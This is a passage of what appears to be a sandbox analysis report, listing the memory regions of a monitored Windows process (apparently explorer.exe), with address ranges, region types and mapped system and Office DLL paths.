0x8de0000 end_va = 0x8e5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008de0000" filename = "" Region: id = 559 start_va = 0x8e60000 end_va = 0x8edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008e60000" filename = "" Region: id = 560 start_va = 0x8ee0000 end_va = 0x90dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000008ee0000" filename = "" Region: id = 561 start_va = 0x90e0000 end_va = 0x92dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000090e0000" filename = "" Region: id = 562 start_va = 0x92e0000 end_va = 0x935ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000092e0000" filename = "" Region: id = 563 start_va = 0x9360000 end_va = 0x94e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\System32\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ieframe.dll.mui") Region: id = 564 start_va = 0x9560000 end_va = 0x95dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009560000" filename = "" Region: id = 565 start_va = 0x95e0000 end_va = 0x965ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000095e0000" filename = "" Region: id = 566 start_va = 0x9660000 end_va = 0x975ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 567 start_va = 0x9760000 end_va = 0x97dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009760000" filename = "" Region: id = 568 start_va = 0x97e0000 end_va = 0x98dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 569 start_va = 0x98e0000 end_va = 0x99dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 570 start_va = 0x9a10000 end_va = 0x9a10fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a10000" filename = "" Region: id = 571 start_va = 0x9a20000 end_va = 0x9f11fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000009a20000" filename = "" Region: id = 572 start_va = 0x9f20000 end_va = 0xa01ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 573 start_va = 0xa020000 end_va = 0xa11ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 574 start_va = 0xa460000 end_va = 0xa4dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a460000" filename = "" Region: id = 575 start_va = 0xa4e0000 end_va = 0xa55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a4e0000" filename = "" Region: id = 576 start_va = 0xa560000 end_va = 0xa5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a560000" filename = "" Region: id = 577 start_va = 0xa7e0000 end_va = 0xa85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a7e0000" filename = "" Region: id = 578 start_va = 0xa860000 end_va = 0xa8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a860000" filename = "" Region: id = 579 start_va = 0xa8e0000 end_va = 0xa95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a8e0000" filename = "" Region: id = 580 start_va = 0xa960000 end_va = 0xa9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a960000" filename = "" Region: id = 581 start_va = 0xa9e0000 end_va = 0xaadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a9e0000" filename = "" Region: id = 582 start_va = 0xaae0000 end_va = 0xaae3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 583 start_va = 0xaaf0000 end_va = 0xb2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aaf0000" filename = "" Region: id = 584 start_va = 0xb360000 end_va = 0xb3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b360000" filename = "" Region: id = 585 start_va = 0xb7e0000 end_va = 0xb85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b7e0000" filename = "" Region: id = 586 start_va = 0xb860000 end_va = 0xb8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b860000" filename = "" Region: id = 587 start_va = 0xb9e0000 end_va = 0xbed1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9e0000" filename = "" Region: id = 588 start_va = 0xc260000 end_va = 0xc2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000c260000" filename = "" Region: id = 589 start_va = 0xcae0000 end_va = 0xcb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000cae0000" filename = "" Region: id = 590 start_va = 0xcb60000 end_va = 0xf77dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 591 start_va = 0xf9e0000 end_va = 0xfa5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f9e0000" filename = "" Region: id = 592 start_va = 0xfa60000 end_va = 0x1045ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000fa60000" filename = "" Region: id = 593 start_va = 0x10760000 end_va = 0x10c51fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010760000" filename = "" Region: id = 594 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 595 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 596 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 597 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 598 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 599 start_va = 0x7ff6ca9b0000 end_va = 0x7ff6cadf7fff monitored = 0 entry_point = 0x7ff6caa4e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 600 start_va = 0x7ffc412e0000 end_va = 0x7ffc41433fff monitored = 0 entry_point = 0x7ffc412e7d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 601 start_va = 0x7ffc43590000 end_va = 0x7ffc4425cfff monitored = 0 entry_point = 0x7ffc436de880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 602 start_va = 0x7ffc45230000 end_va = 0x7ffc4527dfff monitored = 0 entry_point = 0x7ffc45241ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 603 start_va = 0x7ffc45f70000 end_va = 0x7ffc45fbffff monitored = 0 entry_point = 0x7ffc45fa1220 region_type = mapped_file name = "windows.system.launcher.dll" filename = "\\Windows\\System32\\Windows.System.Launcher.dll" (normalized: "c:\\windows\\system32\\windows.system.launcher.dll") Region: id = 604 start_va = 0x7ffc46590000 end_va = 0x7ffc468d5fff monitored = 0 entry_point = 0x7ffc46598530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 605 start_va = 0x7ffc468e0000 end_va = 0x7ffc46b22fff monitored = 0 entry_point = 0x7ffc468e36c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 606 start_va = 0x7ffc46b30000 end_va = 0x7ffc46b7ffff monitored = 0 entry_point = 0x7ffc46b3be50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 607 start_va = 0x7ffc46b80000 end_va = 0x7ffc46b96fff monitored = 0 entry_point = 0x7ffc46b82790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 608 start_va = 0x7ffc46ba0000 end_va = 0x7ffc46be1fff monitored = 0 entry_point = 0x7ffc46ba2230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 609 start_va = 0x7ffc46bf0000 end_va = 0x7ffc46c68fff monitored = 0 entry_point = 0x7ffc46bf22d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 610 start_va = 0x7ffc46c70000 end_va = 0x7ffc46ceafff monitored = 0 entry_point = 0x7ffc46c73af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 611 start_va = 0x7ffc46cf0000 end_va = 0x7ffc46e49fff monitored = 0 entry_point = 0x7ffc46cf4610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 612 start_va = 0x7ffc46e50000 end_va = 0x7ffc4704dfff monitored = 0 entry_point = 0x7ffc46e516c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 613 start_va = 0x7ffc47050000 end_va = 0x7ffc470b3fff monitored = 0 entry_point = 0x7ffc47056b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 614 start_va = 0x7ffc47420000 end_va = 0x7ffc4745dfff monitored = 0 entry_point = 0x7ffc47429650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 615 start_va = 0x7ffc49cf0000 end_va = 0x7ffc49d8ffff monitored = 0 entry_point = 0x7ffc49d60910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 616 start_va = 0x7ffc49d90000 end_va = 0x7ffc49ed0fff monitored = 0 entry_point = 0x7ffc49d95f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 617 start_va = 0x7ffc4a260000 end_va = 0x7ffc4a268fff monitored = 0 entry_point = 0x7ffc4a261b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 618 start_va = 0x7ffc4a290000 end_va = 0x7ffc4a33bfff monitored = 0 entry_point = 0x7ffc4a2959c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 619 start_va = 0x7ffc4a340000 end_va = 0x7ffc4a460fff monitored = 0 entry_point = 0x7ffc4a341cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 620 start_va = 0x7ffc4a470000 end_va = 0x7ffc4a4a4fff monitored = 0 entry_point = 0x7ffc4a473cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 621 start_va = 0x7ffc4a570000 end_va = 0x7ffc4a57ffff monitored = 0 entry_point = 0x7ffc4a573d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 622 start_va = 0x7ffc4a5b0000 end_va = 0x7ffc4a5ddfff monitored = 0 entry_point = 0x7ffc4a5b6580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 623 start_va = 0x7ffc4af60000 end_va = 0x7ffc4afa7fff monitored = 0 entry_point = 0x7ffc4af6a430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 624 start_va = 0x7ffc4bce0000 end_va = 0x7ffc4bcf4fff monitored = 0 entry_point = 0x7ffc4bce5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 625 start_va = 0x7ffc4bd00000 end_va = 0x7ffc4bd4afff monitored = 0 entry_point = 0x7ffc4bd11590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 626 start_va = 0x7ffc4bd50000 end_va = 0x7ffc4bd63fff monitored = 0 entry_point = 0x7ffc4bd53710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 627 start_va = 0x7ffc4be00000 end_va = 0x7ffc4be1dfff monitored = 0 entry_point = 0x7ffc4be0ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 628 start_va = 0x7ffc4bf20000 end_va = 0x7ffc4bf2ffff monitored = 0 entry_point = 0x7ffc4bf278e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 629 start_va = 0x7ffc4c910000 end_va = 0x7ffc4c931fff monitored = 0 entry_point = 0x7ffc4c912580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 630 start_va = 0x7ffc4cc30000 end_va = 0x7ffc4cca6fff monitored = 0 entry_point = 0x7ffc4cc32af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 631 start_va = 0x7ffc4dfc0000 end_va = 0x7ffc4dffffff monitored = 0 entry_point = 0x7ffc4dfd6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 632 start_va = 0x7ffc4e070000 end_va = 0x7ffc4e08efff monitored = 0 entry_point = 0x7ffc4e0737e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 633 start_va = 0x7ffc4e090000 end_va = 0x7ffc4e108fff monitored = 0 entry_point = 0x7ffc4e0976a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 634 start_va = 0x7ffc4e2f0000 end_va = 0x7ffc4e305fff monitored = 0 entry_point = 0x7ffc4e2f1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 635 start_va = 0x7ffc4e6d0000 end_va = 0x7ffc4e887fff monitored = 0 entry_point = 0x7ffc4e73e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 636 start_va = 0x7ffc4f120000 end_va = 0x7ffc4f17bfff monitored = 0 entry_point = 0x7ffc4f137190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 637 start_va = 0x7ffc4f180000 end_va = 0x7ffc4f216fff monitored = 0 entry_point = 0x7ffc4f18ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 638 start_va = 0x7ffc4f220000 end_va = 0x7ffc4f22bfff monitored = 0 entry_point = 0x7ffc4f2235c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 639 start_va = 0x7ffc4f280000 end_va = 0x7ffc4f28bfff monitored = 0 entry_point = 0x7ffc4f2814b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 640 start_va = 0x7ffc4f290000 end_va = 0x7ffc4f438fff monitored = 0 entry_point = 0x7ffc4f2e4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 641 start_va = 0x7ffc50600000 end_va = 0x7ffc50625fff monitored = 0 entry_point = 0x7ffc50615cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 642 start_va = 0x7ffc50630000 end_va = 0x7ffc5065afff monitored = 0 entry_point = 0x7ffc50634240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 643 start_va = 0x7ffc506a0000 end_va = 0x7ffc50725fff monitored = 0 entry_point = 0x7ffc506c1e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 644 start_va = 0x7ffc50730000 end_va = 0x7ffc50809fff monitored = 0 entry_point = 0x7ffc50763c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 645 start_va = 0x7ffc508f0000 end_va = 0x7ffc50a0ffff monitored = 0 entry_point = 0x7ffc50928310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 646 start_va = 0x7ffc50a10000 end_va = 0x7ffc50a46fff monitored = 0 entry_point = 0x7ffc50a120a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 647 start_va = 0x7ffc50a50000 end_va = 0x7ffc50d89fff monitored = 0 entry_point = 0x7ffc50a58520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 648 start_va = 0x7ffc50d90000 end_va = 0x7ffc50e2dfff monitored = 0 entry_point = 0x7ffc50dd9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 649 start_va = 0x7ffc50e30000 end_va = 0x7ffc50e46fff monitored = 0 entry_point = 0x7ffc50e3c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 650 start_va = 0x7ffc50e50000 end_va = 0x7ffc51063fff monitored = 0 entry_point = 0x7ffc50e51000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 651 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 652 start_va = 0x7ffc51300000 end_va = 0x7ffc51309fff monitored = 0 entry_point = 0x7ffc51301350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 653 start_va = 0x7ffc51310000 end_va = 0x7ffc513fefff monitored = 0 entry_point = 0x7ffc513329cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 654 start_va = 0x7ffc51400000 end_va = 0x7ffc514a5fff monitored = 0 entry_point = 0x7ffc5144efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 655 start_va = 0x7ffc514b0000 end_va = 0x7ffc5163efff monitored = 0 entry_point = 0x7ffc514c01d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 656 start_va = 0x7ffc51640000 end_va = 0x7ffc5164cfff monitored = 0 entry_point = 0x7ffc51641ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 657 start_va = 0x7ffc51650000 end_va = 0x7ffc5169cfff monitored = 0 entry_point = 0x7ffc51667de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 658 start_va = 0x7ffc516a0000 end_va = 0x7ffc516b1fff monitored = 0 entry_point = 0x7ffc516a3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 659 start_va = 0x7ffc516c0000 end_va = 0x7ffc516e5fff monitored = 0 entry_point = 0x7ffc516c1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 660 start_va = 0x7ffc516f0000 end_va = 0x7ffc517cafff monitored = 0 entry_point = 0x7ffc517028b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 661 start_va = 0x7ffc51940000 end_va = 0x7ffc5195afff monitored = 0 entry_point = 0x7ffc5194af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 662 start_va = 0x7ffc51960000 end_va = 0x7ffc519f3fff monitored = 0 entry_point = 0x7ffc51999210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 663 start_va = 0x7ffc51a00000 end_va = 0x7ffc51ca2fff monitored = 0 entry_point = 0x7ffc51a26190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 664 start_va = 0x7ffc51cd0000 end_va = 0x7ffc51cdbfff monitored = 0 entry_point = 0x7ffc51cd18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 665 start_va = 0x7ffc51ce0000 end_va = 0x7ffc51d2cfff monitored = 0 entry_point = 0x7ffc51ced180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 666 start_va = 0x7ffc51d30000 end_va = 0x7ffc5283afff monitored = 0 entry_point = 0x7ffc51e7a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 667 start_va = 0x7ffc52840000 end_va = 0x7ffc5288ffff monitored = 0 entry_point = 0x7ffc52842580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 668 start_va = 0x7ffc52890000 end_va = 0x7ffc52d2ffff monitored = 0 entry_point = 0x7ffc52928740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 669 start_va = 0x7ffc52d30000 end_va = 0x7ffc52d79fff monitored = 0 entry_point = 0x7ffc52d35800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 670 start_va = 0x7ffc52d80000 end_va = 0x7ffc52de9fff monitored = 0 entry_point = 0x7ffc52d95e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 671 start_va = 0x7ffc52df0000 end_va = 0x7ffc52e54fff monitored = 0 entry_point = 0x7ffc52df4c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 672 start_va = 0x7ffc52e60000 end_va = 0x7ffc530d3fff monitored = 0 entry_point = 0x7ffc52ed0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 673 start_va = 0x7ffc530e0000 end_va = 0x7ffc530f4fff monitored = 0 entry_point = 0x7ffc530e2c90 region_type = mapped_file name = 